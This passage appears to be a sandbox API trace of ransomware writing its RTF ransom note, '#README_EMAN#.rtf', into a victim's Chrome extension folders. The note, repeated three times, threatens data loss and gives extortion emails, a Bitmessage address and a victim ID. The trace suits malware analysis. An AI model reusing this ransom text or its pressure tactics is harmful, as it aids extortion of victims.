m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0278.851] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.852] CloseHandle (hObject=0x2c8) returned 1 [0278.852] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\#readme_eman#.rtf")) returned 0xffffffff [0278.852] GetLastError () returned 0x2 [0278.852] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 